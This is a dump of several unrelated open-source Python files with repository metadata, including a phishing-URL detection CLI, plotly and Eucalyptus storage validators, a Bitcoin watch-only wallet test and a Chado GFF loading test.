has_infile = False
has_outfile = False
input_file_path = "files/urls.csv"
output_file_path = "files/results.csv"
try:
opts, args = getopt.getopt(argv, "hs:i:o:", ["help", "string=", "infile=", "outfile="])
except getopt.GetoptError:
print("Error(000): invalid options")
print("phishing_detection.py -s <string> -i <input_file> -o <output_file>")
return
if (not opts):
print("Running script on default url.")
call_integrate(url)
else:
for opt, arg in opts:
if opt in ("-h", "--help"):
print("phishing_detection.py -s <string> -i <input_file> -o <output_file>")
return
elif opt in ("-s", "--string"):
url = arg
call_integrate(url)
elif opt in ("-i", "--infile"):
has_infile = True
input_file_path = arg
elif opt in ("-o", "--outfile"):
has_outfile = True
output_file_path = arg
    if has_outfile and not has_infile:
        print("Error(002): requires input_file")
        return
    if has_infile:
        call_integrate_for_file(input_file_path, output_file_path)
if __name__ == "__main__":
print("===============Starting phishing_detection.py===============")
main(sys.argv[1:])
print("===============Finishing phishing_detection.py==============")
|
{
"content_hash": "aa906e30ebe6328fa3b878864a7f39f0",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 112,
"avg_line_length": 33.27777777777778,
"alnum_prop": 0.5321368948247078,
"repo_name": "jaeyung1001/phishing_site_detection",
"id": "6b0d7ffc44f2247417cb5c931772bd9b4db15999",
"size": "2396",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "phishing_detection/phishing_detection.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "35309"
}
],
"symlink_target": ""
}
|
import _plotly_utils.basevalidators
class ArrayminussrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="arrayminussrc", parent_name="scatter3d.error_x", **kwargs
):
super(ArrayminussrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
|
{
"content_hash": "a15c12f057460d959cfa9c38b81d476b",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 84,
"avg_line_length": 34.285714285714285,
"alnum_prop": 0.60625,
"repo_name": "plotly/python-api",
"id": "159dbff9da6e6b6045949b5665d44cb22359731b",
"size": "480",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/scatter3d/error_x/_arrayminussrc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "6870"
},
{
"name": "Makefile",
"bytes": "1708"
},
{
"name": "Python",
"bytes": "823245"
},
{
"name": "Shell",
"bytes": "3238"
}
],
"symlink_target": ""
}
|
from calyptos.plugins.validator.validatorplugin import ValidatorPlugin
class Storage(ValidatorPlugin):
def validate(self):
self.topology = self.environment['default_attributes']['eucalyptus']['topology']
        # Default to an empty mapping so the membership checks below don't
        # raise AttributeError when no system properties are configured
        self.systemproperties = self.environment['default_attributes']['eucalyptus'].get('system-properties', {})
for name in self.topology['clusters'].keys():
if 'storage-backend' in self.topology['clusters'][name]:
storage_options = ['netapp', 'ceph-rbd', 'threepar']
netapp_properties = [name + '.storage.chapuser', name + '.storage.ncpaths', name + '.storage.scpaths',
name + '.storage.sanhost', name + '.storage.sanpassword', name +
'.storage.sanuser', name + '.storage.vservername']
ceph_properties = [name + '.storage.cephconfigfile', name + '.storage.cephkeyringfile',
name + '.storage.cephsnapshotpools', name + '.storage.cephuser',
name + '.storage.cephvolumepools']
threepar_properties = [name + '.storage.chapuser', name + '.storage.ncpaths', name + '.storage.sanhost',
name + '.storage.sanuser', name + '.storage.sanpassword', name +
'.storage.scpaths', name + '.storage.threeparwsport', name + '.storage.usercpg',
name + '.storage.copycpg']
for val1 in storage_options:
if val1 in self.topology['clusters'][name]['storage-backend']:
if val1 == "netapp":
storage_properties = netapp_properties
if val1 == "ceph-rbd":
storage_properties = ceph_properties
if val1 == "threepar":
storage_properties = threepar_properties
for val2 in storage_properties:
try:
assert val2 in self.systemproperties
self.success(val1 + ' system property ' + val2 + ' is present.')
except AssertionError, e:
self.failure(val1 + ' system property ' + val2 + ' is missing or invalid! ' + str(e))
|
{
"content_hash": "87361780abc0840a739ce71b674e3beb",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 120,
"avg_line_length": 73.20588235294117,
"alnum_prop": 0.5162715950180795,
"repo_name": "nephomaniac/calyptos",
"id": "1c8bba32300d722d190015a77d7c9ecb2549bf5d",
"size": "2489",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "calyptos/plugins/validator/storage.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "67650"
}
],
"symlink_target": ""
}
|
from ex_fifo36 import convert
def test_fifo36_conversion():
convert()
|
{
"content_hash": "f3ce5854058012fd16085a620d7248ea",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 29,
"avg_line_length": 12.833333333333334,
"alnum_prop": 0.7142857142857143,
"repo_name": "NickShaffner/rhea",
"id": "ca235f946f2638f8d2eb30f4e53e61f9b96b747b",
"size": "79",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/cores/fifo36/test_fifo36.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "2185"
},
{
"name": "Python",
"bytes": "671881"
},
{
"name": "Shell",
"bytes": "1590"
},
{
"name": "VHDL",
"bytes": "10452"
},
{
"name": "Verilog",
"bytes": "22193"
}
],
"symlink_target": ""
}
|
from django.conf.urls import url
from . import views
app_name = 'base'
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^problems/$', views.problem_report, name='problem')
]
|
{
"content_hash": "5b4fb33d8c12e81237a80c37fd38b3c5",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 61,
"avg_line_length": 21.77777777777778,
"alnum_prop": 0.6530612244897959,
"repo_name": "bit-bots/imagetagger",
"id": "a463903d4b4ac530a4ef00524cdddaf1a78b872a",
"size": "196",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/imagetagger/base/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "12288"
},
{
"name": "Dockerfile",
"bytes": "2049"
},
{
"name": "HTML",
"bytes": "273837"
},
{
"name": "JavaScript",
"bytes": "234939"
},
{
"name": "Python",
"bytes": "252248"
},
{
"name": "Shell",
"bytes": "299"
}
],
"symlink_target": ""
}
|
import sys
def solveGomoku(size, grid, findAll=False):
"""Find the winning player from a gomoku game state.
If findAll is True, try to find all winning sets of 5 pawns."""
# Function to read the grid
def getPawn(row, col):
if (row < 0) or (row >= size) or (col < 0) or (col >= size):
return 0
else:
return grid[row][col]
# Possible directions for alignment
directions = [(-1, 1), (0, 1), (1, 1), (1, 0)]
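    # These four directions are sufficient: since every cell is scanned, each
    # line of five is found from one of its ends, so the four mirrored
    # directions would only rediscover the same lines.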
# (Inefficient) scan of all possibilities
allAligns = []
for row in range(size):
for col in range(size):
# We look for the current pawn, and check if there are 4 from the
# same player aligned in any direction
player = grid[row][col]
if True: # XXX wrong here
for (deltaRow, deltaCol) in directions:
curRow = row
curCol = col
for i in range(4):
curRow += deltaRow
curCol += deltaCol
if getPawn(curRow, curCol) != player:
# We got a pawn from the other player (or no pawn)
break
else:
# We didn't 'break', so we got 5 aligned pawns
if findAll:
allAligns.append((row, col, player))
else:
return player
if findAll:
return allAligns
else:
# No 5 pawns aligned found, return 0
return 0
if __name__ == '__main__':
# Read input
size = int(sys.stdin.readline().strip())
grid = [list(map(int, sys.stdin.readline().split())) for i in range(size)]
# Search for the winning player
print solveGomoku(size, grid)
|
{
"content_hash": "36f7f19e2210f13634e3a104e15b4038",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 78,
"avg_line_length": 34.25925925925926,
"alnum_prop": 0.49405405405405406,
"repo_name": "France-ioi/taskgrader",
"id": "ef05103f81fc23174236ed70866e268794b5c3aa",
"size": "2068",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/taskTestchecker/tests/gen/sol_wrong1.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "1753"
},
{
"name": "C++",
"bytes": "2997"
},
{
"name": "Java",
"bytes": "266"
},
{
"name": "JavaScript",
"bytes": "196"
},
{
"name": "OCaml",
"bytes": "1310"
},
{
"name": "PHP",
"bytes": "94"
},
{
"name": "Pascal",
"bytes": "147"
},
{
"name": "Python",
"bytes": "284222"
},
{
"name": "Shell",
"bytes": "10107"
}
],
"symlink_target": ""
}
|
"""Test createwallet watchonly arguments.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error
)
class CreateWalletWatchonlyTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node = self.nodes[0]
self.nodes[0].createwallet(wallet_name='default')
def_wallet = node.get_wallet_rpc('default')
a1 = def_wallet.getnewaddress()
wo_change = def_wallet.getnewaddress()
wo_addr = def_wallet.getnewaddress()
self.nodes[0].createwallet(wallet_name='wo', disable_private_keys=True)
wo_wallet = node.get_wallet_rpc('wo')
wo_wallet.importpubkey(pubkey=def_wallet.getaddressinfo(wo_addr)['pubkey'])
wo_wallet.importpubkey(pubkey=def_wallet.getaddressinfo(wo_change)['pubkey'])
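        # the watch-only wallet can now see transactions involving these
        # addresses, but holds no private keys and so cannot spend from them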
# generate some btc for testing
node.generatetoaddress(101, a1)
# send 1 btc to our watch-only address
txid = def_wallet.sendtoaddress(wo_addr, 1)
self.nodes[0].generate(1)
# getbalance
self.log.info('include_watchonly should default to true for watch-only wallets')
self.log.info('Testing getbalance watch-only defaults')
assert_equal(wo_wallet.getbalance(), 1)
assert_equal(len(wo_wallet.listtransactions()), 1)
assert_equal(wo_wallet.getbalance(include_watchonly=False), 0)
self.log.info('Test sending from a watch-only wallet raises RPC error')
msg = "Error: Private keys are disabled for this wallet"
assert_raises_rpc_error(-4, msg, wo_wallet.sendtoaddress, a1, 0.1)
assert_raises_rpc_error(-4, msg, wo_wallet.sendmany, amounts={a1: 0.1})
self.log.info('Testing listreceivedbyaddress watch-only defaults')
result = wo_wallet.listreceivedbyaddress()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listreceivedbyaddress(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listreceivedbylabel watch-only defaults')
result = wo_wallet.listreceivedbylabel()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listreceivedbylabel(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listtransactions watch-only defaults')
result = wo_wallet.listtransactions()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listtransactions(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listsinceblock watch-only defaults')
result = wo_wallet.listsinceblock()
assert_equal(len(result["transactions"]), 1)
assert_equal(result["transactions"][0]["involvesWatchonly"], True)
result = wo_wallet.listsinceblock(include_watchonly=False)
assert_equal(len(result["transactions"]), 0)
self.log.info('Testing gettransaction watch-only defaults')
result = wo_wallet.gettransaction(txid)
assert_equal(result["details"][0]["involvesWatchonly"], True)
result = wo_wallet.gettransaction(txid=txid, include_watchonly=False)
assert_equal(len(result["details"]), 0)
self.log.info('Testing walletcreatefundedpsbt watch-only defaults')
inputs = []
outputs = [{a1: 0.5}]
options = {'changeAddress': wo_change}
no_wo_options = {'changeAddress': wo_change, 'includeWatching': False}
result = wo_wallet.walletcreatefundedpsbt(inputs=inputs, outputs=outputs, options=options)
assert_equal("psbt" in result, True)
assert_raises_rpc_error(-4, "Insufficient funds", wo_wallet.walletcreatefundedpsbt, inputs, outputs, 0, no_wo_options)
self.log.info('Testing fundrawtransaction watch-only defaults')
rawtx = wo_wallet.createrawtransaction(inputs=inputs, outputs=outputs)
result = wo_wallet.fundrawtransaction(hexstring=rawtx, options=options)
assert_equal("hex" in result, True)
assert_raises_rpc_error(-4, "Insufficient funds", wo_wallet.fundrawtransaction, rawtx, no_wo_options)
if __name__ == '__main__':
CreateWalletWatchonlyTest().main()
|
{
"content_hash": "0ab22c65984ed9365102f80066ec7657",
"timestamp": "",
"source": "github",
"line_count": 107,
"max_line_length": 126,
"avg_line_length": 42.271028037383175,
"alnum_prop": 0.6734468273269953,
"repo_name": "litecoin-project/litecoin",
"id": "2bf7c094e56f93591268a182434407a5dedf040a",
"size": "4737",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/functional/wallet_watchonly.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "898000"
},
{
"name": "C",
"bytes": "1594708"
},
{
"name": "C++",
"bytes": "8860047"
},
{
"name": "CMake",
"bytes": "29310"
},
{
"name": "HTML",
"bytes": "21833"
},
{
"name": "Java",
"bytes": "30291"
},
{
"name": "M4",
"bytes": "226003"
},
{
"name": "Makefile",
"bytes": "123607"
},
{
"name": "Objective-C++",
"bytes": "5489"
},
{
"name": "Python",
"bytes": "2267056"
},
{
"name": "QMake",
"bytes": "798"
},
{
"name": "Sage",
"bytes": "31382"
},
{
"name": "Scheme",
"bytes": "7554"
},
{
"name": "Shell",
"bytes": "150309"
}
],
"symlink_target": ""
}
|
class computed_property(object):
def __init__(self, get_func):
self.get_func = get_func
def __get__(self, instance, owner):
if instance is None:
return self
return self.get_func(instance)
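# A minimal usage sketch (not part of the original module): the descriptor
# simply re-invokes the wrapped function on every attribute access, so the
# value is recomputed each time rather than cached.
if __name__ == '__main__':
    class Rectangle(object):
        def __init__(self, width, height):
            self.width = width
            self.height = height
        @computed_property
        def area(self):
            return self.width * self.height
    assert Rectangle(3, 4).area == 12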
|
{
"content_hash": "2b373257e1cdec7ae4a45d0922586fda",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 37,
"avg_line_length": 26.375,
"alnum_prop": 0.6492890995260664,
"repo_name": "uskudnik/ggrc-core",
"id": "2f723ffc520c20e13995cc97d5abd8454f159e2c",
"size": "451",
"binary": false,
"copies": "7",
"ref": "refs/heads/develop",
"path": "src/ggrc/models/computed_property.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "232153"
},
{
"name": "Cucumber",
"bytes": "140526"
},
{
"name": "HTML",
"bytes": "6048248"
},
{
"name": "JavaScript",
"bytes": "1878527"
},
{
"name": "Makefile",
"bytes": "5524"
},
{
"name": "Mako",
"bytes": "1720"
},
{
"name": "Python",
"bytes": "1532862"
},
{
"name": "Ruby",
"bytes": "1496"
},
{
"name": "Shell",
"bytes": "11509"
}
],
"symlink_target": ""
}
|
import pytest
from machina.core.db.models import get_model
from machina.test.factories import (
PostFactory, UserFactory, create_category_forum, create_forum, create_link_forum, create_topic
)
Post = get_model('forum_conversation', 'Post')
Topic = get_model('forum_conversation', 'Topic')
@pytest.mark.django_db
class TestApprovedManager(object):
@pytest.fixture(autouse=True)
def setup(self):
self.u1 = UserFactory.create()
# Set up a top-level category
self.top_level_cat = create_category_forum()
# Set up some forums
self.forum_1 = create_forum(parent=self.top_level_cat)
self.forum_2 = create_forum(parent=self.top_level_cat)
self.forum_3 = create_link_forum(parent=self.top_level_cat)
# Set up a top-level forum link
self.top_level_link = create_link_forum()
# Set up some topics
self.forum_1_topic = create_topic(forum=self.forum_1, poster=self.u1)
self.forum_3_topic = create_topic(forum=self.forum_3, poster=self.u1)
self.forum_3_topic_2 = create_topic(forum=self.forum_3, poster=self.u1, approved=False)
# Set up some posts
self.post_1 = PostFactory.create(topic=self.forum_1_topic, poster=self.u1)
self.post_2 = PostFactory.create(topic=self.forum_3_topic, poster=self.u1)
self.post_3 = PostFactory.create(topic=self.forum_3_topic, poster=self.u1, approved=False)
def test_can_help_return_approved_topics(self):
# Run
topics = Topic.approved_objects.all()
# Check
assert set(topics) == set([self.forum_3_topic, self.forum_1_topic, ])
def test_can_help_return_approved_posts(self):
# Run
posts = Post.approved_objects.all()
# Check
assert set(posts) == set([self.post_1, self.post_2, ])
|
{
"content_hash": "64d109ff0326419fc415342b40bf0778",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 98,
"avg_line_length": 36.58,
"alnum_prop": 0.6593767085839256,
"repo_name": "ellmetha/django-machina",
"id": "ea5dd4f2141837a283dde0a43908b86559998750",
"size": "1829",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/unit/apps/forum_conversation/test_managers.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "455"
},
{
"name": "HTML",
"bytes": "129594"
},
{
"name": "JavaScript",
"bytes": "6073"
},
{
"name": "Makefile",
"bytes": "3783"
},
{
"name": "Python",
"bytes": "743877"
},
{
"name": "SCSS",
"bytes": "8981"
}
],
"symlink_target": ""
}
|
"""Workflow_Event TQL Filter"""
# standard library
from enum import Enum
# first-party
from tcex.api.tc.v3.api_endpoints import ApiEndpoints
from tcex.api.tc.v3.filter_abc import FilterABC
from tcex.api.tc.v3.tql.tql_type import TqlType
class WorkflowEventFilter(FilterABC):
"""Filter Object for WorkflowEvents"""
@property
def _api_endpoint(self) -> str:
"""Return the API endpoint."""
return ApiEndpoints.WORKFLOW_EVENTS.value
def case_id(self, operator: Enum, case_id: int):
"""Filter Case ID based on **caseId** keyword.
Args:
operator: The operator enum for the filter.
case_id: The ID of the case this event is associated with.
"""
self._tql.add_filter('caseId', operator, case_id, TqlType.INTEGER)
def date_added(self, operator: Enum, date_added: str):
"""Filter Date Added based on **dateAdded** keyword.
Args:
operator: The operator enum for the filter.
date_added: The date the event was added.
"""
date_added = self.utils.any_to_datetime(date_added).strftime('%Y-%m-%d %H:%M:%S')
self._tql.add_filter('dateAdded', operator, date_added, TqlType.STRING)
def deleted(self, operator: Enum, deleted: bool):
"""Filter Deleted based on **deleted** keyword.
Args:
operator: The operator enum for the filter.
deleted: The deletion status of the event.
"""
self._tql.add_filter('deleted', operator, deleted, TqlType.BOOLEAN)
def deleted_reason(self, operator: Enum, deleted_reason: str):
"""Filter Deleted Reason based on **deletedReason** keyword.
Args:
operator: The operator enum for the filter.
deleted_reason: The reason the event was deleted.
"""
self._tql.add_filter('deletedReason', operator, deleted_reason, TqlType.STRING)
def event_date(self, operator: Enum, event_date: str):
"""Filter Event Date based on **eventDate** keyword.
Args:
operator: The operator enum for the filter.
event_date: The date the event occurred.
"""
event_date = self.utils.any_to_datetime(event_date).strftime('%Y-%m-%d %H:%M:%S')
self._tql.add_filter('eventDate', operator, event_date, TqlType.STRING)
def id(self, operator: Enum, id: int): # pylint: disable=redefined-builtin
"""Filter ID based on **id** keyword.
Args:
operator: The operator enum for the filter.
id: The ID of the event.
"""
self._tql.add_filter('id', operator, id, TqlType.INTEGER)
def link(self, operator: Enum, link: str):
"""Filter Link based on **link** keyword.
Args:
operator: The operator enum for the filter.
link: The item this event pertains to, in format <type>:<id>.
"""
self._tql.add_filter('link', operator, link, TqlType.STRING)
def summary(self, operator: Enum, summary: str):
"""Filter Summary based on **summary** keyword.
Args:
operator: The operator enum for the filter.
summary: Text of the event.
"""
self._tql.add_filter('summary', operator, summary, TqlType.STRING)
def system_generated(self, operator: Enum, system_generated: bool):
"""Filter System Generated based on **systemGenerated** keyword.
Args:
operator: The operator enum for the filter.
system_generated: Flag determining if this event was created automatically by the
system.
"""
self._tql.add_filter('systemGenerated', operator, system_generated, TqlType.BOOLEAN)
def user_name(self, operator: Enum, user_name: str):
"""Filter User Name based on **userName** keyword.
Args:
operator: The operator enum for the filter.
user_name: The username associated with the event.
"""
self._tql.add_filter('userName', operator, user_name, TqlType.STRING)
|
{
"content_hash": "46a1a9e16c9cf6f189fd721c311aafd8",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 93,
"avg_line_length": 37.04545454545455,
"alnum_prop": 0.618159509202454,
"repo_name": "ThreatConnect-Inc/tcex",
"id": "6ba4a4a6f8ab767e7728907d1455021621209863",
"size": "4075",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tcex/api/tc/v3/workflow_events/workflow_event_filter.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2735042"
}
],
"symlink_target": ""
}
|
""" Jekyll at Rackspace Cloud Files with Clean URLs """
import os
import cloudfiles
# Rackspace Cloud API credentials
USERNAME = "RACKSPACECLOUD_USERNAME"
API_KEY = "RACKSPACECLOUD_API_KEY"
# The name of your container.
# I create containers in the format: www.domain.com
CONTAINER_NAME = "www.yourdomain.com"
conn = cloudfiles.get_connection(username=USERNAME,
api_key=API_KEY,
serviceNet=False)
container = conn.get_container(CONTAINER_NAME)
# Upload all files in the jekyll _site directory
for root, dirs, files in os.walk('_site'):
for name in files:
filename = os.path.join(root, name)
# Remove _site/ from the uploaded file name,
# or else our URL will be www.domain.com/_site/post-name
upload_filename = filename.replace("_site/", "")
# Upload the file to Rackspace Cloud Files
obj = container.create_object(upload_filename)
# Check if the file contains HTML code.
# If so, we need to set the correct content type.
        with open(filename) as source:
            for line in source:
                if "<!DOCTYPE html>" in line:
                    print "file %s is an HTML file!" % filename
                    # If html file, then set content type
                    obj.content_type = "text/html"
                    break
        # Stream the file up to Cloud Files, closing the handle afterwards
        fp = open(filename)
        print "uploading filename: %s" % upload_filename
        obj.write(fp)
        fp.close()
|
{
"content_hash": "5ecf2d12c01c79ea410d62bd5db1893a",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 64,
"avg_line_length": 34.41463414634146,
"alnum_prop": 0.6236711552090716,
"repo_name": "nicholaskuechler/jekyll-rackspace-cloudfiles-clean-urls",
"id": "e7e6bda6d823234e55eb31f292bdfad584f36c46",
"size": "1534",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cloudfiles_jekyll_upload.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1534"
},
{
"name": "Ruby",
"bytes": "643"
}
],
"symlink_target": ""
}
|
import pytest
from deepctr.models import DeepFM
from ..utils import check_model, get_test_data, SAMPLE_SIZE, get_test_data_estimator, check_estimator, TEST_Estimator
@pytest.mark.parametrize(
'hidden_size,sparse_feature_num',
[((2,), 1), #
((3,), 2)
] # (True, (32,), 3), (False, (32,), 1)
)
def test_DeepFM(hidden_size, sparse_feature_num):
model_name = "DeepFM"
sample_size = SAMPLE_SIZE
x, y, feature_columns = get_test_data(sample_size, sparse_feature_num=sparse_feature_num,
dense_feature_num=sparse_feature_num)
model = DeepFM(feature_columns, feature_columns, dnn_hidden_units=hidden_size, dnn_dropout=0.5)
check_model(model, model_name, x, y)
@pytest.mark.parametrize(
'hidden_size,sparse_feature_num',
[
((3,), 2)
] # (True, (32,), 3), (False, (32,), 1)
)
def test_DeepFMEstimator(hidden_size, sparse_feature_num):
if not TEST_Estimator:
return
from deepctr.estimator import DeepFMEstimator
sample_size = SAMPLE_SIZE
linear_feature_columns, dnn_feature_columns, input_fn = get_test_data_estimator(sample_size,
sparse_feature_num=sparse_feature_num,
dense_feature_num=sparse_feature_num,
classification=False)
model = DeepFMEstimator(linear_feature_columns, dnn_feature_columns, dnn_hidden_units=hidden_size, dnn_dropout=0.5,
task="regression")
check_estimator(model, input_fn)
if __name__ == "__main__":
pass
|
{
"content_hash": "3613b76a3a00715ae3d9078fad7b6d6e",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 122,
"avg_line_length": 37.191489361702125,
"alnum_prop": 0.5577803203661327,
"repo_name": "shenweichen/DeepCTR",
"id": "b466fbc8182147d1752e156d0747c3f0f23571cb",
"size": "1748",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/models/DeepFM_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "511770"
}
],
"symlink_target": ""
}
|
"""This example gets all ad groups for a given campaign.
To add an ad group, run add_ad_group.py.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
from googleads import adwords
PAGE_SIZE = 500
CAMPAIGN_ID = 'INSERT_CAMPAIGN_ID_HERE'
def main(client, campaign_id):
# Initialize appropriate service.
ad_group_service = client.GetService('AdGroupService', version='v201502')
# Construct selector and get all ad groups.
offset = 0
selector = {
'fields': ['Id', 'Name', 'Status'],
'predicates': [
{
'field': 'CampaignId',
'operator': 'EQUALS',
'values': [campaign_id]
}
],
'paging': {
'startIndex': str(offset),
'numberResults': str(PAGE_SIZE)
}
}
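  # Page through the results PAGE_SIZE entries at a time until the service
  # reports that all entries have been consumed.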
more_pages = True
while more_pages:
page = ad_group_service.get(selector)
# Display results.
if 'entries' in page:
for ad_group in page['entries']:
print ('Ad group with name \'%s\', id \'%s\' and status \'%s\' was '
'found.' % (ad_group['name'], ad_group['id'],
ad_group['status']))
else:
print 'No ad groups were found.'
offset += PAGE_SIZE
selector['paging']['startIndex'] = str(offset)
more_pages = offset < int(page['totalNumEntries'])
if __name__ == '__main__':
# Initialize client object.
adwords_client = adwords.AdWordsClient.LoadFromStorage()
main(adwords_client, CAMPAIGN_ID)
|
{
"content_hash": "aae882dd7d28b15cb25167c28fa76b17",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 77,
"avg_line_length": 27.327868852459016,
"alnum_prop": 0.611877624475105,
"repo_name": "losnikitos/googleads-python-lib",
"id": "c295768f54e2c1f614aff5974409cfaa90e9f9f6",
"size": "2285",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "examples/adwords/v201502/basic_operations/get_ad_groups.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "168602"
}
],
"symlink_target": ""
}
|
from __future__ import division
import csv
def load_inflation_data(filename='usinf.csv'):
with open(filename, 'rb') as inflation:
reader = csv.reader(inflation)
reader.next() #ignore first line
data = {int(row[0]): float(row[1]) for row in reader}
return data
def calculate_inflation(principle, start_year, end_year, inflation_data_file='usinf.csv'):
data = load_inflation_data(inflation_data_file)
if start_year >= end_year:
raise ValueError('Start year must be before end year')
    if start_year < min(data.keys()):
        raise ValueError('Start year must be greater than or equal to %s' % min(data.keys()))
    if end_year > max(data.keys()):
        raise ValueError('End year must be less than or equal to %s' % max(data.keys()))
amount = principle
for year in xrange(start_year, end_year+1):
amount += data[year]/100 * amount
return amount
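# Worked example (hypothetical rates): if the data maps 2001 to 2.0 and 2002
# to 3.0, calculate_inflation(100, 2001, 2002) compounds both years:
# 100 * 1.02 * 1.03, about 105.06.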
def get_user_input():
start_year = int(raw_input('Enter a start year: '))
end_year = int(raw_input('Enter a end year: '))
principle = float(raw_input('Enter a starting amount: '))
print principle, 'USD in', start_year, 'is equal to', calculate_inflation(principle, start_year, end_year), 'in', end_year
if __name__ == '__main__':
get_user_input()
|
{
"content_hash": "01b9fc08683fafa842ac94c3a520eebf",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 126,
"avg_line_length": 35.24324324324324,
"alnum_prop": 0.6449386503067485,
"repo_name": "cgkanchi/usinflation",
"id": "739de87fbf0f2df5a4fe27e7794028648342de40",
"size": "1304",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "usinflation.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1304"
}
],
"symlink_target": ""
}
|
from nose.tools import raises
from . import ChadoTestCase, ci
class GFFTest(ChadoTestCase):
def _del_dbxref(self):
self.ci.session.query(self.ci.model.dbxref).filter(
self.ci.model.dbxref.db_id == 1,
(self.ci.model.dbxref.accession.like('VNBP%') | self.ci.model.dbxref.accession.like('%VIRU'))
).delete(synchronize_session='fetch')
def test_load_gff(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
        assert len(gene_f.featureloc_collection) == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
